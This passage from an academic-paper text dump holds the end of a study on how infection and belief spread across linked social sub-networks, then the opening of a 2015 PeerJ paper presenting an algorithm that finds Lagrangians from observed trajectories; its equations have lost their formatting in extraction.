infection of all individuals in the total sub-networks is virtually guaranteed. Simulation results indicate that with a single link between total sub-networks the average time to full infection shifts only from an average of 3.8 steps to an average of 2.98 with a change of infection rate from 100% to 50%. For ring sub-networks, on the other hand, the same change in infection rate roughly doubles the time to full infection across all numbers of linkages. For more realistic infection rates, therefore, it is more important rather than less to know the structure of social networks. If those sub- networks approximate total networks, neither infection rate nor additional links between sub- networks make much difference. If sub- networks approximate ring networks, both number of links and infection rate will make a dramatic difference in the course of an infection. Where average time to infection is our measure, degree of linkage between sub-networks as opposed to additional links within a single network of that structure is not of particular significance. But here we need to add an important proviso: this does not mean that the course of an epidemic across a single network and across sub-networks with various degrees of linkage is not significantly different. That dynamic is often very different—in ways that might be important for intervention, for example—even where average time to total infection is the same. The typical graphs in Figure 3 show the rate of new infections over time for (a) a single network and (b) linked sub- networks of that type. Single networks show a smooth normal curve of increasing and declining rates of new infection. Linked sub- networks show a saddle of slower infection between two more rapid peaks. Despite uniformity of predicted time to total infection, therefore, sparsely linked sub- networks will always be 'fragile' at those links, with temporal saddle points in the course of an Figure 3. Contrasting Dynamics of Infection in Single and Linked Sub-networks epidemic to match. Those weak linkages and saddle points offer crucial opportunities for targeted vaccination in advance of an epidemic, or intervention in the course of it. Information Dynamics across Linked Sub- Networks What you believe travels differently. In what follows we use a simple model of belief updating to show the crucial importance of degree of sub-network linkage in belief or information transmission across a network. Some earlier results have noted similarities in infection dynamics and the spread of ideas (Newman 2001, Redner 1998, Börner et. al. 2003). Our purpose is to emphasize crucial differences between them. In this first model our agents' beliefs are represented as a single number between 0 and 1. These are beliefs in the severity of a disease, perhaps, the probability of contracting the disease, or the effectiveness of vaccination. (Harrison, Mullen, & Green 1992; Janz & Becker, 1984; Mullen, Hersey, and Iverson, 1987; Strecher & Rosenstock, 1997). Agents are influenced by the beliefs of those around them, updating their belief representation in terms of the beliefs of those with whom they have information linkages. To this extent we can argue that the model is relatively realistic: some beliefs can be represented on such a scale, and people are influenced to change those beliefs by, among other things, the expressed beliefs of those with whom they have contact. What is admittedly unrealistic is the simple form of belief updating we use in the model: an averaging of current beliefs with those with whom one has network contact. No-one thinks that averaging of beliefs in an informational neighborhood captures the real dynamics of belief change. Such a mechanism does, however, instantiate a pattern of reinforcement: the more one's beliefs are like those of one's network neighbors, and the more they are like more of one's network neighbors, the less inclination there will be to change those beliefs. The more one's beliefs are out of sync with one's neighbors, the greater the pressure there will be to change one's beliefs. That beliefs will change in accord with some pattern of reinforcement along those lines is very plausible, backed by a range of social psychological data, and is therefore an aspect of realism in the model. What is unrealistic is the particular form of reinforcement instantiated here—the particularly simple pattern of belief averaging, applied homogeneously across all agents. In order to be informative regarding an exterior reality, a model, like any theory, must capture relevant aspects of that reality. In order to offer both tractability and understanding, a model, like any theory, must simplify. This first model of belief transmission is intended to capture a reality of belief reinforcement; the admittedly artificial assumption of belief averaging is our simplification. 6 Our attempt, then, is not to reproduce any particular pattern of realistic belief change but to emphasize the impact of certain predictable 6 For background on both the importance and limit of realism in different forms of models, see Grim, Rosenberg, Rosenfeld, Anderson, & Eason 2010 and Rosenberg, Grim, Rosenfeld, Anderson & Eason 2010. characteristics of belief change—with reinforcement a primary component—on the dynamics of belief. In particular, we want to emphasize the major differences between the dynamics of belief change across information networks and the dynamics of infection diffusion across contact networks, outlined above. What you believe travels differently. Given belief averaging, and regardless of initial assignment of belief representations, all agents in this model eventually approach the same belief value. We can therefore measure the effect of network structure on belief convergence by measuring the number of steps required on average until all agents in the network are within, say, a range of .1 above or below the mean belief across the network as a whole. In what follows we use this range of variance from the mean as our measure of convergence, averaging over 100 runs in each case. We begin with polarized agents. Half of our agents are drawn from a pool with belief measures that form a normal distribution around .25, with a deviation of .06. The other half are drawn from a pool with belief measures in similar normal distribution around .75. In studying linked sub-networks our agents in one sub-network are drawn from the .25 pool; those in the other are drawn from the .75 pool. In the case of single networks agents are drawn randomly from each pool. We found belief polarization of this form to be necessary in order to study the effects of sub-network linkage in particular; were beliefs of all our agents merely randomized, convergence to an approximate mean could be expected to occur in each sub-network independently, and time to consensus would not then be an adequate measure of the effect of sub-network linkage. Belief Diffusion across Ring and Total Networks In outlining the dynamics of infection we contrasted linked sub-networks of particular structures—ring, small world, random, total, and scale-free—with single networks of the same structure. In exploring the dynamics of belief we will again study these types side by side. As we add additional links between sub- networks, how does the dynamics of belief diffusion change, measured in terms of time to consensus across the community. We progressively add random links (1) between belief-polarized ring sub-networks, and (2) within a single ring network of belief-polarized agents. Average times to consensus are shown in Figure 4. Increasing linkages between polarized ring sub- networks makes a dramatic difference. Average time to consensus for a single linkage in such a case is 692.44. The average time to consensus for 50 linkages is 11.59, with a distinct and characteristic curve between them. For infection, we noted, there is virtually no difference between added links within a single ring network and added links between ring sub- networks. In the case of belief, in contrast, there is a dramatic difference between the two graphs. Within a single total network, all agents will achieve a mean belief in a single step; additional linkages in such a case are merely redundant. Results in total sub-networks, in contrast, parallel those for rings above. Average steps to belief convergence with a single link approximate 700 steps in both cases; with 50 links, average time to convergence is 12 in the case of rings and 16 in the case of total sub-networks. The overall pattern of the two graphs is also very much the same. What that similarity shows is the striking effect of degree linkage in each case: an effect that in the transmission of belief overrides the fact that we are dealing with totally distributed ring networks in one case, totally connected networks in the other. Belief Transmission across Small World, Random, and Scale-Free Networks The same contrasts between single and linked sub-networks in the case of belief transmission hold for other network structures as well. The effect of added linkages within a single small-world network closely parallels that for the single ring shown above. Results for added linkages in small-world sub-networks are dramatically different. In absolute terms the results for small worlds differ from those shown for rings, declining from 481 steps to 11.4. The shape of the curve for small worlds, however, is very much that shown for rings above. Given a single random network, using 2.25% of possible linkages, additional linkages give a decline in time to belief consensus from only approximately 6 steps to 4. Where random sub- networks are at issue (using 4.5% of possible linkages in each sub-network), the curve is again that displayed for rings above, though here absolute values decline from 244 to 10.15. For single scale-free networks, additional linkages give a roughly linear decline from 20 to 7 steps. For scale-free sub-networks, additional linkages again follow the curve shown above, here with absolute values dipping from 325 to 11.73. A similar curve characterizes effects of degree linkage in belief transmission regardless of the basic structure of the sub-networks involved. Although absolute values across that curve differ significantly, the shape of the curve does not. We emphasize this point in Figure 5 by plotting belief transmission results for sub-network types in log-log form. Linkage degree effects follow the same pattern regardless of the structure of sub-networks. If one wants to plot the course of an epidemic, we noted in section I, it is crucial that one knows the structure of the networks involved. If one wants to plot the course of belief transmission, knowledge of structure is much less important. The particular structure of networks is important in order to gauge whether a single link between sub-networks will allow consensus in 140 steps or 700, as indicated for hub and total networks Figure 4. Time to Belief Consensus with Increasing Linkages in Single Ring and between Ring Sub-networks Figure 5. Time to Belief Consensus with Increasing Linkages between Sub-networks (plotted log-log) in Figure 5. The pattern of changes in belief transmission with increasing linkages between sub-networks from any initial point, however, is precisely the same regardless of network structure. That pattern is the classic signature of power law distributions, indicating that the relationship between increased linkage and time to consensus parallels a range of natural and social phenomena, including the relationship between frequency and size of earthquakes, metabolic rate and body mass of a species, size of a city and the number of patents it produces. Power law distributions also appear in some empirically observed characteristics of biochemical, protein, citation and sexual contact networks (Faloutsos, Faloutsos, & Faloutsos, 1999; Jeong, Tombor, Albert, Ottvai, & Barbási 2000; Fell & Wagner 2000; Liljeros, Edling, Amaral, Stanley, & Åberg 2001; Newman 2001, 2005). The fact that such an effect appears in linkage effects on the dynamics of belief suggests the possibility of incorporating a range of theoretical and methodological work from other disciplines in studying behavior dynamics in the spread of disease, particularly with an eye to the effect of belief polarization, health care disparities, and social linkage or integration between ethnic and socio-economic sub- communities. CONCLUSIONS & FUTURE WORK Our focus here has been on the structure of contact and informational networks and the very different impact of aspects of that structure on the dynamics of infection and information. For infection, measured in terms of average time to total infection across a network, it is the structure of the network or sub-networks that trumps other effects. In attempting to gauge time to total infection across a community, the primary piece of information needed is whether the social network or component networks at issue approximate rings, hubs, wheels, small worlds, random, scale-free or total networks. For time to total infection, degree of linkage between sub-networks is of much less importance, though we have noted that points of linkage continue to play an important role with regard to fragility and prospects for targeted intervention. For information, measured in terms of average time to belief consensus, the importance of general structure and linkage between sub- networks are reversed. On the model of belief used here, in attempting to gauge the dynamics of information flow across a community, the primary piece of information needed is the degree of linkage between composite sub- communities, whatever their internal structure. The fact that the particular structure of those sub-communities is of lesser importance is highlighted by the fact that average time to belief consensus given increasing linkages follows the same familiar power-law pattern regardless of networks structures involved. It is quite plausible that belief transmission involves strong reinforcement effects; the model of belief used here is designed to capture such an effect. In other regards, however, the belief model used is quite clearly artificial. Belief change is by simple averaging of information contacts, and all agents follow the same formula for belief updating. Our attempt in future work will be to test the robustness of conclusions here by considering a range of variations on the central model of belief change. REFERENCES Auld, M. C. (2003). Choices, beliefs, and infectious disease dynamics. Journal of Health Economics 22, 361-377. Barbasi, A.-L. & R. Albert (1999). Emergence of scaling in random networks. Science 286, 509-512. Barrett, C. L., K. Bisset, J. Leidig, A. Marathe, & M. Marathe (2009). Estimating the impact of public and private strategies for controlling an epidemic: A multi-agent approach. Proceedings of the Twenty-First Innovative Applications of Artificial Intelligence Conference, AAAI, 34-39. Börner, K., Maru, J. T., & Goldstone, R. L. (2003). The simultaneous evolution of author and paper networks. Proceedings of the National Academy of Sciences of the USA, 101 (Suppl.1), 5266-5273. Centola, D., & M. Macy (2007). Complex contagion and the weakness of long ties. American Journal of Sociology 113, 702-34. Del Valle, S., H. Hethcote, J. M. Hyman, & C. Castillo-Chavez (2005). Effects of behavioral changes in a smallpox attack model. Mathematical Biosciences, 195, 228-251. Epstein, J. M., J. Parker, D. Cummings, & R. A. Hammond (2008). Coupled contagion dynamics of fear and disease: Mathematical and computational explorations. PLoS ONE 3(12): e3955. doi:10.1371/journal.pone.0003955 Eubank, S., H. Guclu, V. A. Kumar, M. Marathe, A. Srinivasan, Z. Toroczkai, & N. Wang (2004). Modeling disease outbreaks in realistic urban social networks. Nature 429:180-184. Fell, D., & A. Wagner (2000). The small world of metabolism. Nature Biotechnology 18, 1121-1122, reprinted in Newman, Barbási, & Watts, The Structure and Dynamics of Networks, Princeton: Princeton University Press, 2006. Faloutsos, M, P. Faloutsos, & C. Faloutsos (1999). On power-law relationships of the internet topology. SIGCOMM '99, reprinted in Newman, Barbási, & Watts, The Structure and Dynamics of Networks, Princeton: Princeton University Press, 2006. Ferrari, M. J., S. Bansal, L. A. Meyers & O. N. Bjørnstad (2006). Network frailty and the geometry of herd immunity. Proceedings of the Royal Societ. B 273, 2743-2748 Freeman, L. C. (1978). Segregation in social networks. Sociological Methods and Research 6: 411-429. Funk, S., E. Gilad, C. Watkins, & V. A. A. Jansen (2009). The spread of awareness and its impact on epidemic outbreaks. Proceedings of the National Academy of Sciences 106 (16), 6872-6877, www.pnas.org / cgi / doi / 10.1073 / pnas. Golub, B., & M. O. Jackson, forthcoming. How homophily affects learning and diffusion in networks. Granovetter, M. S. (1973). The strength of weak ties. American Journal of Sociology 78, 1360-1380. Grim, P., R. Rosenberg, A. Rosenfeld, B. Anderson, & R. Eason (2010). How simulations fail. Group for Logic & Formal Semantics research report #10-02, SUNY Stony Brook. Hallett, T. B., S. Gregson, J. J. C. Lewis, B. A. Lopman, & G. P. Garnett (2007). Africa: Behavioral change in generalized HIV epidemics: Impact of reducing cross- generational sex and delaying age at sexual debut. Sexually Transmitted Infections 83, p. i50-i54. Hamilton, D., M. Handcock & M. Morris (2008). Degree distributions in sexual networks: A framework for evaluating evidence. Sexually Transmitted Diseases 35, 30-40. Harrison, J. A., P. D. Mullen, & L. W. Green (1992). A meta-analysis of studies of the health belief model. Health Education Research 7:107–116. Janz, N. K., & M. H. Becker (1984). The health belief model: A decade later. Health Education Quarterly 11:1–47. Jeong, H., B. Tombor, R. Albert, Z. N. Ottvai, & A.-L. Barbási (2000). The large-scale organization of metabolic networks. Nature 407, 651-654, reprinted in Newman, Barbási, & Watts, The Structure and Dynamics of Networks, Princeton: Princeton University Press, 2006. Keeling, M., 2005. The implications of network structure for epidemic dynamics. Theoretical Population Biology 67, 1–8. Kincaid, D. L. (2000). Mass media, ideation, and behavior: A longitudinal analysis of contraceptive change in the Philippines. Communication Research 27, 723-763. Klovdahl, A. S. (1985). Social networks and the spread of infectious diseases: The AIDS example. Social Science & Medicine 21, 1203-1216. Liljeros, F., C. R. Edling, L. A. Nunes Amaral, H. E. Stanley, & Y. Åberg (2001). The web of human sexual contacts. Nature 411, 907- 908, reprinted in Newman, Barbási, & Watts, The Structure and Dynamics of Networks, Princeton: Princeton University Press, 2006. Meyers, A. M., B. Pourbohloul, M. E. J. Newman, D. M. Skowronski & R. C. Brunham 2005. Network theory and SARS: predicting outbreak diversity. Journal of Theoretical Biology 232, 71–81. Miller, J. C. & J. M. Hyman, Effective vaccination strategies for realistic social networks. Physica A 386 , 780–785. Morris, M. (1997). Sexual networks and HIV. Aids 11 (suppl A), S209-S216. Morris, M., C. Podhisita, M. J. Wawer & M. S. Handcock (1996). Bridge populations in the spread of HIV/AIDS in Thailand. Aids 10, 1265-1271. Mullen, P. D., J. Hersey, & D. C. Iverson (1987). Health behavior models compared. Social Science and Medicine 24:973–981. Newman, M. E. J. (2001). The structure of scientific collaboration networks. Proceedings of the National Academy of Sciences, 98 (2), 404-409, reprinted in Newman, Barbási, & Watts, The Structure and Dynamics of Networks, Princeton: Princeton University Press, 2006. Newman, M. E. J. (2005). Power laws, Pareto distributions and Zipf's law. Contemporary Physics 46: 323–351. Redner, S. (1998). How popular is your paper? An empirical study of the citation distribution. European Physical Journal B 4, 131-134. Rosenberg, R., P. Grim, A. Rosenfeld, B. Anderson & R. Eason (2010). The Science in simulation: a structural analysis. Group for Logic & Formal Semantics research report #10-01, SUNY Stony Brook. Strecher, V. J., & I. M. Rosenstock (1997). The health belief model. In Health Behavior and Health Education: Theory, Research, and Practice, eds. K. Glanz, F. M. Lewis, and B. K. Rimer. San Francisco: Jossey-Bass. Trotter, R. T., R. B. Rothenberg, & S. Coyle (1995). Drug abuse and HIV prevention research: Expanding paradigms and network contributions to risk reduction. Connections 18, 29-45. Valente, T. (1995). Network Models of the Diffusion of Innovations. Cresskill, N. J.: Hampton Press. Valente, T. (2010). Social Networks and Health: Models, Methods, and Applications. New York: Oxford University Press. Valente, T., & R. L. Davis (1999). Accelerating the diffusion of innovations using opinion leaders. Annals of the AAPSS 566, 55-67. Watts, D. J., & S. H. Strogatz (1998). Collective dynamics of 'small-world' networks. Nature 393, 440. work_seu3plr3nfhaxfaujqqxfctmky ---- An algorithm for discovering Lagrangians automatically from data Submitted 7 August 2015 Accepted 20 October 2015 Published 4 November 2015 Corresponding author Jonathan J. Hudson, jony.hudson@imperial.ac.uk Academic editor Jingbo Wang Additional Information and Declarations can be found on page 15 DOI 10.7717/peerj-cs.31 Copyright 2015 Hills et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS An algorithm for discovering Lagrangians automatically from data Daniel J.A. Hills, Adrian M. Grütter and Jonathan J. Hudson Department of Physics, Imperial College of Science, Technology and Medicine, London, United Kingdom ABSTRACT An activity fundamental to science is building mathematical models. These models are used to both predict the results of future experiments and gain insight into the structure of the system under study. We present an algorithm that automates the model building process in a scientifically principled way. The algorithm can take ob- served trajectories from a wide variety of mechanical systems and, without any other prior knowledge or tuning of parameters, predict the future evolution of the system. It does this by applying the principle of least action and searching for the simplest Lagrangian that describes the system’s behaviour. By generating this Lagrangian in a human interpretable form, it can also provide insight into the workings of the system. Subjects Artificial Intelligence, Data Mining and Machine Learning, Scientific Computing and Simulation Keywords Lagrangian, Physics, Least-action, Discovery INTRODUCTION Modern science is, in many senses, highly automated. Experiments are frequently run under computer control, with data often recorded by the computer directly. Computerised data analysis and visualisation are widely used to process the resulting large volumes of data. Indeed, the ability to collect and analyse massive data sets is opening up an entirely new measure-first-ask-questions-later approach to science: the Square Kilometer Array radio telescope is expected to collect approximately one exabyte of data per day (Newman & Tseng, 0000); over 1014 collisions from the ATLAS detector were analysed in the search for the Higgs boson (ATLAS collaboration, 2012); and state-of-the-art whole-genome sequencers can currently sequence 600 gigabases per day (Hayden, 2014). In each of these examples the scientific questions are not fully formulated in advance of taking the data, and the question of how to best extract knowledge from the dataset is of great interest. This motivates the study of how to scale up the processes of scientific reasoning to take advantage of the wealth of available data. Thus far, scientific reasoning has largely resisted automation. Hypothesising and refining models is still on the whole carried out by humans, with little direct support from computers. It has long been a desire of artificial intelligence researchers to automate this part of science, and with the growing volume of data available from experiments the motivation for this desire comes ever more sharply into focus. In this paper we present a step in this direction: an algorithm that automates finding a mathematical model for a system, in a scientifically principled way, by examining only its observed behaviour. How to cite this article Hills et al. (2015), An algorithm for discovering Lagrangians automatically from data. PeerJ Comput. Sci. 1:e31; DOI 10.7717/peerj-cs.31 mailto:jony.hudson@imperial.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.31 http://dx.doi.org/10.7717/peerj-cs.31 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Early attempts to automatically model physical systems searched for simple math- ematical regularities in observed quantities. Langley’s (1979) BACON system was able to re-discover many simple laws—the ideal gas law, Ohm’s law, Coulomb’s law and others—from experimental data. Dzeroski & Todorovski (1993) went beyond simple static laws with their LAGRANGE system which was able to search for differential equations that governed observed time series. They extended this work to the LAGRAMGE system which additionally allowed an expert user to provide domain knowledge, improving the quality of the results (Todorovski & Dzeroski, 1997). The PRET system, developed by Bradley and collaborators (2001), brings to bear a variety of advanced AI techniques on the problem of identifying system differential equations. It has a sophisticated method for representing qualitative observations, and allows expert-user domain knowledge to be combined with automatic search very effectively. Schmidt & Lipson (2009) used a genetic programming approach to automatically evolve invariant mathematical expressions from observed data.1 1 Note that Schmidt and Lipson originally claim that their technique is capable of discovering Lagrangians, but it has been shown that this is false except for Lagrangians of a very particular, trivial form (Hillar & Sommer, 2012). Schmidt & Lipson (2010) do not include their claim in a subsequent paper on the same work. In the context of engineering, there is a significant body of work on ‘system identification’, with techniques ranging from very general ad hoc fitting methods to fitting detailed physical models representing important classes of system (Sjberg et al., 1995; Ljung, 2010). In this work we take a different approach than those described above, the essence of which is that we embed a simple, general physical principle—the principle of least action—and very little else into our algorithm. While we are embedding the domain knowledge of a physicist in our algorithm, we are not embedding information about any particular physical system or class thereof. Rather we are capturing a deep understanding that has been distilled by physicists over the past 270 years, and packaging it into an algorithm that can be applied by non-experts. We find the algorithm to be surprisingly powerful, given its simplicity, but this power comes not from the ingenuity of its construction, rather from the broad applicability of the physical principle embedded in it. THE PRINCIPLE OF LEAST ACTION The principle of least action is one of the most fundamental and most celebrated principles in physics. First proposed by Maupertuis (1744) and Euler (1744) it states that the problem of predicting the behaviour of many physical systems can be cast as finding the behaviour that minimises the expenditure given by some cost function. The total expenditure of the system is known as the action. It is a remarkable fact that the behaviour of a very wide range of physical systems—including those studied in classical mechanics, special and general relativity, quantum field theory, and optics—can all have their behaviour explained in terms of minimising a cost function. Each physical system has its own cost function, and once this function is known it is possible to predict exactly what the system will do in the future. The exercise of determining the cost function—often known as Lagrange’s function, or just the Lagrangian—for a particular physical system is central to physics. Feynman described this process well (Feynman, Leighton & Sands, 1963) as “some kind of trial and error” advising students that “You just have to fiddle around with the equations that you know and see if you can get them into the form of the principle of least action.” In this paper we Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 2/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 present an algorithm that does this “fiddling” automatically, without requiring the user to have any expertise in physics. The Lagrangian is well-suited to be the output of an automated modelling algorithm. It has the desirable property in that it is a single, scalar expression that contains everything necessary to predict the system’s future evolution. Consider, in contrast, finding the Hamiltonian where it would also be necessary to find the corresponding conjugate momenta. The Lagrangian has the additional quality that it is coordinate-independent and as a result can be written in any coordinate system. This is useful in the case of an automated algorithm where it is not obvious in which coordinate system the data might be presented. However, it should be noted that not all physical systems can be described by a Lagrangian. In particular, dissipative systems can not be modelled this way. Nevertheless, many interesting processes do admit a Lagrangian formulation, and what’s more, as the algorithm is automatic little is lost by speculatively applying it to a system’s trajectory. We might imagine a future where an ensemble of algorithms such as this one try to find an appropriate model for a system, based on a variety of physical principles and insights. We present this algorithm as a step towards such a future system. The problem of taking a Lagrangian and automatically calculating the resulting motion of the system has been widely studied and applied. To the best of our knowledge, this work is the first that solves the inverse problem of taking the observed motion and calculating the Lagrangian for non-trivial systems. THE ALGORITHM To find a model for a system we search over a space of possible Lagrangians. To do this we need three elements: an objective to guide the search, which will take the form of a score function; a representation of the possible Lagrangians; and an algorithm to execute the search over the possible Lagrangians, working to improve the score. We will first describe the score function, which is the central idea of the algorithm. Score function The objective of our algorithm is to find a Lagrangian that, when integrated along the system’s observed trajectory, yields a smaller total (action) than when integrated along any neighbouring trajectory. It would be possible to implement this definition of the least action principle directly in an algorithm, but instead we take an indirect approach that is more computationally efficient. For a Lagrangian L(θ,φ,...,θ̇ ,φ̇,...) and a trajectory (θ (t),φ(t),...,θ̇ (t),φ̇(t),...) it is possible to write down a condition, in the form of a set of differential equations, that must be satisfied if the action is to be stationary along the trajectory. These differential equations are known as Euler–Lagrange’s equations, d dt ∂ L ∂q̇ − ∂ L ∂q = 0 , where q ∈ {θ,φ,...}. It is to be understood that the partial derivatives are taken symbolically with respect to the coordinates and velocities, which are then replaced with the time-dependent functions from the trajectory before the time-derivative is taken. We Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 3/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 can define a score function based on these conditions, EL(L) =  q∈{θ,φ,...}   d dt ∂ L ∂q̇ − ∂ L ∂q 2 dt, (1) which is zero if the Euler–Lagrange equations are exactly satisfied. We note that Hillar and Sommer first proposed using a (different) score function derived from the Euler–Lagrange equations in Hillar & Sommer (2012), but did not apply it to finding Lagrangians from data. In practice our observations of the system are not functions (θ (t),φ(t),...,θ̇ (t),φ̇(t),...) but discretely sampled time-series of the coordinates and generalized velocities. The algorithm operates with a dataset which is a time-series of samples D = ((θ (1),φ(1),...,θ̇ (1),φ̇(1),...),...). where time runs from t = 1...N . The velocity samples may be either directly measured or derived from measured coordinate data. We divide this time-series into two portions, a training set, comprising samples 1...M, and a validation set of samples M + 1...N . The algorithm will conduct its search using only the training set, reserving the validation set for out-of-sample measurement of the prediction error. In this way we can truly test the algorithm’s ability to predict the future dynamics of the system. In all of the examples in this paper the sampling times will be evenly spaced, but this is not a requirement. We can discretize the Euler–Lagrange score function (Eq. (1)) to work with these sampled datasets, giving ELD(L) = M t=1  q∈{θ,φ,...}  d dt ∂ L ∂q̇  t −  ∂ L ∂q  t 2 , (2) where the subscript on the score indicates that it is taken with respect to the dataset D. The square-bracketed quantities in this expression are time-series, and the subscript indicates taking the element in this time-series at the given time. So, for instance, the first term in (2) is to be calculated, in principle, by: first differentiating the candidate Lagrangian L symbolically with respect to the appropriate generalized velocity; evaluating this quantity at every time-step in the dataset to yield a new time-series; taking the discrete derivative of this new time-series with respect to time; and finally finding the element at time t in this time-derivative time-series. In practice, as we shall see below, a more computationally efficient implementation may be used. The function ELD is the basis of the score function, capturing the principle of least action, but it is not sufficient on its own. While it is true that the Lagrangian we seek minimises ELD, the converse is not true as there are other functions which minimise ELD but are not physically meaningful Lagrangians. The first class of functions that we wish to avoid are those which are numerically tiny, for instance L = 10−100θ . We deal with these by Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 4/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 introducing a normalisation score for each candidate Lagrangian, ND(L) = M t=1  q∈{θ,φ,...}  d dt ∂ L ∂q̇ 2 t +  ∂ L ∂q 2 t . We will compose our final score from the scores ELD and ND in such a way, to be detailed below, that to score well a candidate Lagrangian must simultaneously have a low score for ELD and a score of around one for ND. The target value of one for ND is chosen arbitrarily. We can always arrange for the normalisation score to be approximately one, as the least-action trajectory is unchanged if the Lagrangian is scaled by a constant. There is a second, more interesting class, of unwanted expressions that minimise the Euler–Lagrange score ELD. Consider, for instance, the candidate Lagrangian L = θ nθ̇ . This Lagrangian satisfies the Euler–Lagrange equations trivially, in a way that does not depend on the trajectory. Such path-independent least-action Lagrangians are interesting from a physics point-of-view, being closely related to gauge invariance, but here they are a nuisance. To guide the search away from these expressions we introduce a second ‘control’ trajectory, C. This trajectory is unrelated to the behaviour of the system under study and serves solely to eliminate path-independent Lagrangians. We reason that the Lagrangian that we are seeking will score well with ELD but should score poorly on ELC, which is the Euler–Lagrange score evaluated along the control trajectory. The exact form of the control trajectory is unimportant so long as it not a valid trajectory of the system under study. In this work we use a control trajectory which is uniform motion in each coordinate, with velocity arbitrarily chosen to be 0.1, for all experiments. We combine the three parts described above to give the search score function, S(L) = U (ND(L))U (ELC(L)) ELD(L) + ϵ ELC(L) + ϵ , (3) where U(x) = ln(x + ϵ)2 + 1 is a function that is minimised, with value approximately one, when the argument is one. The small constant ϵ, typically set to be 10−10, ensures that the score function has the desired asymptotic behaviour for small values of the numerator and denominator, even when faced with errors from finite precision machine numbers. The factor U (ELC(L)) prevents the search algorithm from driving towards Lagrangians that perform badly on the real dataset, but even worse on the control data. Overall, the score function drives the search to find Lagrangians that simultaneously minimise the action along the observed trajectory while having a non-zero action along the control trajectory, and a normalisation score close to one. We note that the way that the score function is assembled is somewhat ad hoc. Its purpose is to guide the search to the correct answer while avoiding pathologies, and there are a number of ways this could be done—indeed, many were tried during development. This score function is simply presented as a particular arrangement that we have demonstrated to work. Note that the score function, S, does not in any way consider whether the prediction of the candidate Lagrangian agrees with the training data. It only considers whether the trajectory satisfies a least action principle for the candidate Lagrangian. The fact that this, Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 5/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 on the face of it unrelated, objective leads to successful predictions is the insight from physics that we have embedded in our algorithm. Representation and search We have experimented with two representations of candidate Lagrangians. The first, a restricted polynomial representation, allows a fast search algorithm to be implemented. It is limited in the Lagrangians it can represent exactly, although through Taylor’s theorem it can find approximations to any Lagrangian. This representation was used to generate the bulk of the results in this paper, and we describe it in detail in this section. The second representation lifts some of the constraints of the restricted polynomial model, at the expense of vastly increased computational cost. We describe it in ‘Generalisation’. The restricted polynomial representation assumes that the Lagrangian can be represented by a polynomial in the coordinates and velocities. The model is a sum of monomial terms, parameterised by coefficients multiplying every term. We restrict this polynomial in two ways: we limit the maximum power of any coordinate or velocity to be m; and we limit the maximum degree of any combination of coordinates and velocities to p. In addition, we remove any terms from the model that can have no physical significance, that is terms that are constant or of the form qnq̇. These terms simply “fall through” the Euler–Lagrange equation without changing the resulting equations of motion, so there is no value in including them in the search. For example, for one variable θ with m = 3 and p = 4 the resulting model would be c1θ̇ 2 + c2θ̇ 3 + c3θ + c4θ θ̇ 2 + c5θ θ̇ 3 + c6θ 2 + c7θ 2 θ̇ 2 + c8θ 3 . For a given restricted polynomial model the score function is minimised by adjusting the parameters ci. We conduct this optimisation using the Nelder–Mead simplex algorithm (Nelder & Mead, 1965) using the modified parameters of Gao & Han (2012) which improve the efficiency in high dimensions. The coefficients are bounded between −1 and 1, enforced by a penalty function. We use a tight convergence tolerance, usually one part in 1010, to encourage the search to break out of local minima. We impose a maximum iteration limit, usually 5 × 106, on the search to ensure that it is bounded in time. We do not know in advance what values of m and p are needed to accurately represent the Lagrangian of the system under study. What’s more, we wish to find the simplest Lagrangian such that the trajectory satisfies the principle of least action. We approach this using a simple heuristic algorithm. We start with the smallest non-trivial model (m = 2,p = 2) and optimise the parameters with the simplex search. We then make an in-sample prediction of how well the optimised Lagrangian predicts the dynamics of the system in the training sample. This is done by generating equations of motion from the optimised Lagrangian and numerically solving them, using initial conditions derived from the first sample in the dataset. If this in-sample prediction fits better than a specified tolerance then we stop and return the Lagrangian. If it does not fit then we generate a larger model (i.e., with larger values of m and/or p) and try again. The models are stepped through in increasing number of monomial terms. This proceeds until either a model Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 6/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Figure 1 Sketches of the five test systems that we consider. is found that fits or a maximum bound on model complexity is reached. This heuristic algorithm only crudely captures the notion of mathematical complexity of the model, but it seems to work adequately well. Note that, for a given polynomial model, it is possible to partially pre-calculate the score function ELD for a given dataset, yielding a function quadratic in the coefficients ci. This is possible because the form of the model is fixed and it is possible to calculate its derivatives in advance. As a result, after the initial simplification of the score function, optimisation iterations are fast, and have a run-time independent of the number of data points. Code for the score function, search algorithms and the datasets we use below can be downloaded from Hudson, Hills & Grütter (a). RESULTS We will consider five test systems, illustrated in Fig. 1. The first is the unforced Duffing oscillator, a textbook non-linear system. The second, a simple pendulum, is interesting because its Lagrangian cannot be represented exactly in the restricted polynomial representation. The third system, two masses on a frictionless surface joined by three springs to each other and two immovable walls, has two coupled degrees of freedom. The fourth system is the double pendulum, a coupled, two degree-of-freedom non-linear system capable of chaotic motion. As with the simple pendulum, the double pendulum cannot have its Lagrangian represented exactly by a finite degree polynomial. The fifth and final system is the Penning-type ion-trap, a three degree-of-freedom system with magnetic and electrostatic forces, that is of considerable experimental relevance. Figure 2 shows the result of applying the algorithm to simulated data sets for these systems. It can be seen that the algorithm is able to successfully predict the future dynamics of all of the test systems. Let us look in detail at the progress of the algorithm, and the resulting learned models, for two of the example systems. In the case of the Duffing oscillator the algorithm tried seven, increasingly complex, polynomial models to arrive at the prediction shown, which was generated by the model with m = 4 and p = 4. The final model has 10 free parameters, and required 2,160 Nelder–Mead iterations to optimise. The complete search working through all seven models, with a single-threaded implementation, executes in under five seconds on a 2012 2.0GHz Intel Core i7-3667U powered MacBook Air. The optimised Lagrangian, where we 